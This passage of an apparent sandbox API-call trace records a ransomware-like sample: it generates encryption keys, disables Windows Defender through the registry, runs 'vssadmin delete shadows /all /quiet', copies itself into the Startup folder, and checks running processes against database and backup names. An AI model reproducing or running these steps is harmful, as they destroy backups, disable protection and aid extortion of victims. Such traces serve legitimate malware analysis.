0x75edf8f0 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="WaitForMultipleObjects") returned 0x75efec80 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="FindClose") returned 0x75efed70 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="EnterCriticalSection") returned 0x77bfb2d0 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="MoveFileW") returned 0x75ede500 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="GetProcAddress") returned 0x75ea51b0 [0042.653] GetProcAddress (hModule=0x75e90000, lpProcName="GetLastError") returned 0x75ea5010 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="GetTickCount") returned 0x75efdd50 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="HeapReAlloc") returned 0x77bef630 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="HeapAlloc") returned 0x77bf2dc0 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="HeapFree") returned 0x75ea57f0 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="GetProcessHeap") returned 0x75ea51f0 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="FindResourceW") returned 0x75ea4aa0 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="LoadResource") returned 0x75ea5b00 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="SizeofResource") returned 0x75ea6740 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="GetModuleHandleA") returned 0x75ea50b0 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="WideCharToMultiByte") returned 0x75ea6b10 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="LoadLibraryA") returned 0x75ea5a80 [0042.654] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcpyA") returned 0x75ee7060 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="ExitProcess") returned 0x75ea3cb0 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="FindFirstFileW") returned 0x75efedf0 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="VerSetConditionMask") returned 0x77c148b0 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="SetFilePointerEx") returned 0x75eff130 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="GetModuleHandleW") returned 0x75ea50d0 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="GetUserDefaultLangID") returned 0x75ea5690 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="InitializeCriticalSection") returned 0x77c0af20 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="OpenProcess") returned 0x75ea5cc0 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileW") returned 0x75eff3b0 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="LeaveCriticalSection") returned 0x77bfb250 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="TerminateProcess") returned 0x75ea67e0 [0042.655] GetProcAddress (hModule=0x75e90000, lpProcName="GetModuleFileNameW") returned 0x75ea5090 [0042.656] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcmpW") returned 0x75ea6bb0 [0042.656] GetProcAddress (hModule=0x75e90000, lpProcName="lstrlenW") returned 0x75ea6c70 [0042.656] GetProcAddress (hModule=0x75e90000, lpProcName="VerifyVersionInfoW") returned 0x75ee26c0 [0042.656] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x761b0000 [0042.656] GetProcAddress (hModule=0x761b0000, lpProcName="CryptDestroyKey") returned 0x761cfa60 [0042.656] GetProcAddress (hModule=0x761b0000, lpProcName="CryptGenKey") returned 0x761d3430 [0042.656] GetProcAddress (hModule=0x761b0000, lpProcName="CryptExportKey") returned 0x761cf700 [0042.656] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x740f0000 [0042.877] GetProcAddress (hModule=0x740f0000, lpProcName="atexit") returned 0x7410c544 [0042.877] atexit (param_1=0x460920) returned 0 [0042.877] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x761b0000 [0042.877] LoadLibraryW (lpLibFileName="mpr.dll") returned 0x740d0000 [0043.043] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x76480000 [0047.314] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0047.314] FindResourceW (hModule=0x400000, lpName=0x7f, lpType=0xa) returned 0x408048 [0047.314] LoadResource (hModule=0x400000, hResInfo=0x408048) returned 0x408058 [0047.315] SizeofResource (hModule=0x400000, hResInfo=0x408048) returned 0x140a [0047.315] GetProcessHeap () returned 0x5e0000 [0047.315] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x140a) returned 0x603170 [0047.315] GetUserDefaultLangID () returned 0x409 [0047.316] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19eb24 | out: TokenHandle=0x19eb24*=0x224) returned 1 [0047.328] GetTokenInformation (in: TokenHandle=0x224, TokenInformationClass=0x14, TokenInformation=0x19eb1c, TokenInformationLength=0x4, ReturnLength=0x19eb20 | out: TokenInformation=0x19eb1c, ReturnLength=0x19eb20) returned 1 [0047.328] CloseHandle (hObject=0x224) returned 1 [0047.330] CryptAcquireContextW (in: phProv=0x19f088, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f088*=0x5fbd68) returned 1 [0047.901] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77bb0000 [0047.901] GetProcAddress (hModule=0x77bb0000, lpProcName="RtlGetVersion") returned 0x77bdfff0 [0047.901] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0047.901] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0047.901] VerifyVersionInfoW (in: lpVersionInformation=0x19ea00, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x19ea00) returned 1 [0047.901] CryptGenKey (in: hProv=0x5fbd68, Algid=0xa400, dwFlags=0x4000001, phKey=0x19eb18 | out: phKey=0x19eb18*=0x5fe310) returned 1 [0048.209] GetProcessHeap () returned 0x5e0000 [0048.209] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x10) returned 0x6047e0 [0048.212] GetProcessHeap () returned 0x5e0000 [0048.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ade8 [0048.212] CryptExportKey (in: hKey=0x5fe310, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x60ade8, pdwDataLen=0x19eb20 | out: pbData=0x60ade8*, pdwDataLen=0x19eb20*=0x94) returned 1 [0048.212] GetProcessHeap () returned 0x5e0000 [0048.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x94) returned 0x5ee380 [0048.212] CryptExportKey (in: hKey=0x5fe310, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x60ade8, pdwDataLen=0x19eb20 | out: pbData=0x60ade8*, pdwDataLen=0x19eb20*=0x254) returned 1 [0048.212] GetProcessHeap () returned 0x5e0000 [0048.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x254) returned 0x60b1f0 [0048.212] GetProcessHeap () returned 0x5e0000 [0048.212] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ade8 | out: hHeap=0x5e0000) returned 1 [0048.212] CryptDestroyKey (hKey=0x5fe310) returned 1 [0048.212] CryptImportKey (in: hProv=0x5fbd68, pbData=0x5ee380, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x406020 | out: phKey=0x406020*=0x606aa0) returned 1 [0048.212] GetProcessHeap () returned 0x5e0000 [0048.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x60b450 [0048.212] CryptImportKey (in: hProv=0x5fbd68, pbData=0x603170, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x19f080 | out: phKey=0x19f080*=0x606e60) returned 1 [0048.213] CryptEncrypt (in: hKey=0x606e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x19ef7c*, pdwDataLen=0x19f084*=0xf5, dwBufLen=0x100 | out: pbData=0x19ef7c*, pdwDataLen=0x19f084*=0x100) returned 1 [0048.215] CryptEncrypt (in: hKey=0x606e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x19ef7c*, pdwDataLen=0x19f084*=0xf5, dwBufLen=0x100 | out: pbData=0x19ef7c*, pdwDataLen=0x19f084*=0x100) returned 1 [0048.216] CryptEncrypt (in: hKey=0x606e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x19ef7c*, pdwDataLen=0x19f084*=0x6a, dwBufLen=0x100 | out: pbData=0x19ef7c*, pdwDataLen=0x19f084*=0x100) returned 1 [0048.217] CryptDestroyKey (hKey=0x606e60) returned 1 [0048.218] GetProcessHeap () returned 0x5e0000 [0048.218] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x5ee380 | out: hHeap=0x5e0000) returned 1 [0048.218] GetProcessHeap () returned 0x5e0000 [0048.218] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60b1f0 | out: hHeap=0x5e0000) returned 1 [0048.218] GetProcessHeap () returned 0x5e0000 [0048.218] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6047e0 | out: hHeap=0x5e0000) returned 1 [0048.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2, phkResult=0x19f07c | out: phkResult=0x19f07c*=0x234) returned 0x0 [0048.218] RegSetValueExW (in: hKey=0x234, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x19f08c*=0x1, cbData=0x4 | out: lpData=0x19f08c*=0x1) returned 0x0 [0048.218] RegCloseKey (hKey=0x234) returned 0x0 [0048.218] GetWindowsDirectoryW (in: lpBuffer=0x19ed40, uSize=0x104 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0048.218] lstrcatW (in: lpString1="C:\\WINDOWS", lpString2="\\sysnative\\vssadmin.exe" | out: lpString1="C:\\WINDOWS\\sysnative\\vssadmin.exe") returned="C:\\WINDOWS\\sysnative\\vssadmin.exe" [0048.218] lstrcpyW (in: lpString1=0x19eb38, lpString2=" delete shadows /all /quiet" | out: lpString1=" delete shadows /all /quiet") returned=" delete shadows /all /quiet" [0048.218] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\WINDOWS\\sysnative\\vssadmin.exe", lpParameters=" delete shadows /all /quiet", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0057.179] GetTickCount () returned 0x114ebd8 [0057.179] GetTickCount () returned 0x114ebd8 [0057.179] GetTickCount () returned 0x114ebd8 [0057.179] GetTickCount () returned 0x114ebd8 [0057.179] GetTickCount () returned 0x114ebd8 [0057.179] GetTickCount () returned 0x114ebd8 [0057.179] StrCmpNA (lpStr1="%link%", lpStr2="%name%", nChar=6) returned -1 [0057.179] StrCmpNA (lpStr1="%link%", lpStr2="%link%", nChar=6) returned 0 [0057.179] StrCmpNA (lpStr1="%name%", lpStr2="%name%", nChar=6) returned 0 [0057.180] StrCmpNA (lpStr1="%ID%\r\n", lpStr2="%name%", nChar=6) returned -1 [0057.180] StrCmpNA (lpStr1="%ID%\r\n", lpStr2="%link%", nChar=6) returned -1 [0057.180] StrCmpNA (lpStr1="%ID%", lpStr2="%ID%", nChar=4) returned 0 [0057.180] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19e8dc, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\vxjqig.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\vxjqig.exe")) returned 0x22 [0057.180] lstrcpyW (in: lpString1=0x19e6d4, lpString2="C:\\Users\\FD1HVy\\Desktop\\vxjqig.exe" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\vxjqig.exe") returned="C:\\Users\\FD1HVy\\Desktop\\vxjqig.exe" [0057.180] PathRemoveFileSpecW (in: pszPath="C:\\Users\\FD1HVy\\Desktop\\vxjqig.exe" | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 1 [0057.180] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x19e4cc | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0057.192] lstrcmpW (lpString1="C:\\Users\\FD1HVy\\Desktop", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.192] GetTickCount () returned 0x114ebe8 [0057.193] wnsprintfW (in: pszDest=0x406040, cchDest=260, pszFmt="%s\\%s" | out: pszDest="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm") returned 97 [0057.193] wnsprintfW (in: pszDest=0x19e2c4, cchDest=260, pszFmt="%s.exe" | out: pszDest="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm.exe") returned 101 [0057.193] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\vxjqig.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\vxjqig.exe"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\wnlue3jw5zpc48utrqm.exe"), bFailIfExists=0) returned 1 [0057.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x300 [0057.577] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0057.578] StrCmpNW (lpStr1="[Syst", lpStr2="mysql", nChar=5) returned -1 [0057.578] StrCmpNW (lpStr1="[Sy", lpStr2="IBM", nChar=3) returned -1 [0057.578] StrCmpNW (lpStr1="[Syst", lpStr2="bes10", nChar=5) returned -1 [0057.578] StrCmpNW (lpStr1="[Syst", lpStr2="black", nChar=5) returned -1 [0057.578] StrCmpNW (lpStr1="[Sy", lpStr2="sql", nChar=3) returned -1 [0057.578] StrCmpNW (lpStr1="[System P", lpStr2="store.exe", nChar=9) returned -1 [0057.578] StrCmpNW (lpStr1="[Sy", lpStr2="vee", nChar=3) returned -1 [0057.578] StrCmpNW (lpStr1="[Syst", lpStr2="postg", nChar=5) returned -1 [0057.578] StrCmpNW (lpStr1="[Sys", lpStr2="sage", nChar=4) returned -1 [0057.578] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0057.579] StrCmpNW (lpStr1="Syste", lpStr2="mysql", nChar=5) returned 1 [0057.579] StrCmpNW (lpStr1="Sys", lpStr2="IBM", nChar=3) returned 1 [0057.579] StrCmpNW (lpStr1="Syste", lpStr2="bes10", nChar=5) returned 1 [0057.579] StrCmpNW (lpStr1="Syste", lpStr2="black", nChar=5) returned 1 [0057.579] StrCmpNW (lpStr1="Sys", lpStr2="sql", nChar=3) returned 1 [0057.579] StrCmpNW (lpStr1="System", lpStr2="store.exe", nChar=9) returned 1 [0057.579] StrCmpNW (lpStr1="Sys", lpStr2="vee", nChar=3) returned -1 [0057.579] StrCmpNW (lpStr1="Syste", lpStr2="postg", nChar=5) returned 1 [0057.579] StrCmpNW (lpStr1="Syst", lpStr2="sage", nChar=4) returned 1 [0057.579] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0057.579] StrCmpNW (lpStr1="smss.", lpStr2="mysql", nChar=5) returned 1 [0057.579] StrCmpNW (lpStr1="sms", lpStr2="IBM", nChar=3) returned 1 [0057.579] StrCmpNW (lpStr1="smss.", lpStr2="bes10", nChar=5) returned 1 [0057.579] StrCmpNW (lpStr1="smss.", lpStr2="black", nChar=5) returned 1 [0057.579] StrCmpNW (lpStr1="sms", lpStr2="sql", nChar=3) returned -1 [0057.579] StrCmpNW (lpStr1="smss.exe", lpStr2="store.exe", nChar=9) returned -1 [0057.579] StrCmpNW (lpStr1="sms", lpStr2="vee", nChar=3) returned -1 [0057.579] StrCmpNW (lpStr1="smss.", lpStr2="postg", nChar=5) returned 1 [0057.579] StrCmpNW (lpStr1="smss", lpStr2="sage", nChar=4) returned 1 [0057.579] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.580] StrCmpNW (lpStr1="csrss", lpStr2="mysql", nChar=5) returned -1 [0057.580] StrCmpNW (lpStr1="csr", lpStr2="IBM", nChar=3) returned -1 [0057.580] StrCmpNW (lpStr1="csrss", lpStr2="bes10", nChar=5) returned 1 [0057.580] StrCmpNW (lpStr1="csrss", lpStr2="black", nChar=5) returned 1 [0057.580] StrCmpNW (lpStr1="csr", lpStr2="sql", nChar=3) returned -1 [0057.580] StrCmpNW (lpStr1="csrss.exe", lpStr2="store.exe", nChar=9) returned -1 [0057.580] StrCmpNW (lpStr1="csr", lpStr2="vee", nChar=3) returned -1 [0057.580] StrCmpNW (lpStr1="csrss", lpStr2="postg", nChar=5) returned -1 [0057.580] StrCmpNW (lpStr1="csrs", lpStr2="sage", nChar=4) returned -1 [0057.580] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0057.581] StrCmpNW (lpStr1="winin", lpStr2="mysql", nChar=5) returned 1 [0057.581] StrCmpNW (lpStr1="win", lpStr2="IBM", nChar=3) returned 1 [0057.581] StrCmpNW (lpStr1="winin", lpStr2="bes10", nChar=5) returned 1 [0057.581] StrCmpNW (lpStr1="winin", lpStr2="black", nChar=5) returned 1 [0057.581] StrCmpNW (lpStr1="win", lpStr2="sql", nChar=3) returned 1 [0057.581] StrCmpNW (lpStr1="wininit.e", lpStr2="store.exe", nChar=9) returned 1 [0057.581] StrCmpNW (lpStr1="win", lpStr2="vee", nChar=3) returned 1 [0057.581] StrCmpNW (lpStr1="winin", lpStr2="postg", nChar=5) returned 1 [0057.581] StrCmpNW (lpStr1="wini", lpStr2="sage", nChar=4) returned 1 [0057.581] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.581] StrCmpNW (lpStr1="csrss", lpStr2="mysql", nChar=5) returned -1 [0057.581] StrCmpNW (lpStr1="csr", lpStr2="IBM", nChar=3) returned -1 [0057.582] StrCmpNW (lpStr1="csrss", lpStr2="bes10", nChar=5) returned 1 [0057.582] StrCmpNW (lpStr1="csrss", lpStr2="black", nChar=5) returned 1 [0057.582] StrCmpNW (lpStr1="csr", lpStr2="sql", nChar=3) returned -1 [0057.582] StrCmpNW (lpStr1="csrss.exe", lpStr2="store.exe", nChar=9) returned -1 [0057.582] StrCmpNW (lpStr1="csr", lpStr2="vee", nChar=3) returned -1 [0057.582] StrCmpNW (lpStr1="csrss", lpStr2="postg", nChar=5) returned -1 [0057.582] StrCmpNW (lpStr1="csrs", lpStr2="sage", nChar=4) returned -1 [0057.582] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0057.609] StrCmpNW (lpStr1="winlo", lpStr2="mysql", nChar=5) returned 1 [0057.609] StrCmpNW (lpStr1="win", lpStr2="IBM", nChar=3) returned 1 [0057.609] StrCmpNW (lpStr1="winlo", lpStr2="bes10", nChar=5) returned 1 [0057.609] StrCmpNW (lpStr1="winlo", lpStr2="black", nChar=5) returned 1 [0057.609] StrCmpNW (lpStr1="win", lpStr2="sql", nChar=3) returned 1 [0057.609] StrCmpNW (lpStr1="winlogon.", lpStr2="store.exe", nChar=9) returned 1 [0057.609] StrCmpNW (lpStr1="win", lpStr2="vee", nChar=3) returned 1 [0057.609] StrCmpNW (lpStr1="winlo", lpStr2="postg", nChar=5) returned 1 [0057.609] StrCmpNW (lpStr1="winl", lpStr2="sage", nChar=4) returned 1 [0057.609] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0057.610] StrCmpNW (lpStr1="servi", lpStr2="mysql", nChar=5) returned 1 [0057.610] StrCmpNW (lpStr1="ser", lpStr2="IBM", nChar=3) returned 1 [0057.610] StrCmpNW (lpStr1="servi", lpStr2="bes10", nChar=5) returned 1 [0057.610] StrCmpNW (lpStr1="servi", lpStr2="black", nChar=5) returned 1 [0057.610] StrCmpNW (lpStr1="ser", lpStr2="sql", nChar=3) returned -1 [0057.610] StrCmpNW (lpStr1="services.", lpStr2="store.exe", nChar=9) returned -1 [0057.610] StrCmpNW (lpStr1="ser", lpStr2="vee", nChar=3) returned -1 [0057.610] StrCmpNW (lpStr1="servi", lpStr2="postg", nChar=5) returned 1 [0057.610] StrCmpNW (lpStr1="serv", lpStr2="sage", nChar=4) returned 1 [0057.610] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0057.611] StrCmpNW (lpStr1="lsass", lpStr2="mysql", nChar=5) returned -1 [0057.611] StrCmpNW (lpStr1="lsa", lpStr2="IBM", nChar=3) returned 1 [0057.611] StrCmpNW (lpStr1="lsass", lpStr2="bes10", nChar=5) returned 1 [0057.611] StrCmpNW (lpStr1="lsass", lpStr2="black", nChar=5) returned 1 [0057.611] StrCmpNW (lpStr1="lsa", lpStr2="sql", nChar=3) returned -1 [0057.611] StrCmpNW (lpStr1="lsass.exe", lpStr2="store.exe", nChar=9) returned -1 [0057.611] StrCmpNW (lpStr1="lsa", lpStr2="vee", nChar=3) returned -1 [0057.611] StrCmpNW (lpStr1="lsass", lpStr2="postg", nChar=5) returned -1 [0057.611] StrCmpNW (lpStr1="lsas", lpStr2="sage", nChar=4) returned -1 [0057.611] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.611] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.611] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.611] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.611] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.611] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.611] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.611] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.611] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.612] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.612] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0057.612] StrCmpNW (lpStr1="fontd", lpStr2="mysql", nChar=5) returned -1 [0057.612] StrCmpNW (lpStr1="fon", lpStr2="IBM", nChar=3) returned -1 [0057.612] StrCmpNW (lpStr1="fontd", lpStr2="bes10", nChar=5) returned 1 [0057.612] StrCmpNW (lpStr1="fontd", lpStr2="black", nChar=5) returned 1 [0057.612] StrCmpNW (lpStr1="fon", lpStr2="sql", nChar=3) returned -1 [0057.612] StrCmpNW (lpStr1="fontdrvho", lpStr2="store.exe", nChar=9) returned -1 [0057.612] StrCmpNW (lpStr1="fon", lpStr2="vee", nChar=3) returned -1 [0057.612] StrCmpNW (lpStr1="fontd", lpStr2="postg", nChar=5) returned -1 [0057.612] StrCmpNW (lpStr1="font", lpStr2="sage", nChar=4) returned -1 [0057.612] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0057.613] StrCmpNW (lpStr1="fontd", lpStr2="mysql", nChar=5) returned -1 [0057.613] StrCmpNW (lpStr1="fon", lpStr2="IBM", nChar=3) returned -1 [0057.613] StrCmpNW (lpStr1="fontd", lpStr2="bes10", nChar=5) returned 1 [0057.613] StrCmpNW (lpStr1="fontd", lpStr2="black", nChar=5) returned 1 [0057.613] StrCmpNW (lpStr1="fon", lpStr2="sql", nChar=3) returned -1 [0057.613] StrCmpNW (lpStr1="fontdrvho", lpStr2="store.exe", nChar=9) returned -1 [0057.613] StrCmpNW (lpStr1="fon", lpStr2="vee", nChar=3) returned -1 [0057.613] StrCmpNW (lpStr1="fontd", lpStr2="postg", nChar=5) returned -1 [0057.613] StrCmpNW (lpStr1="font", lpStr2="sage", nChar=4) returned -1 [0057.613] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.613] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.613] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.613] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.614] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.614] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.614] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.614] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.614] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.614] StrCmpNW 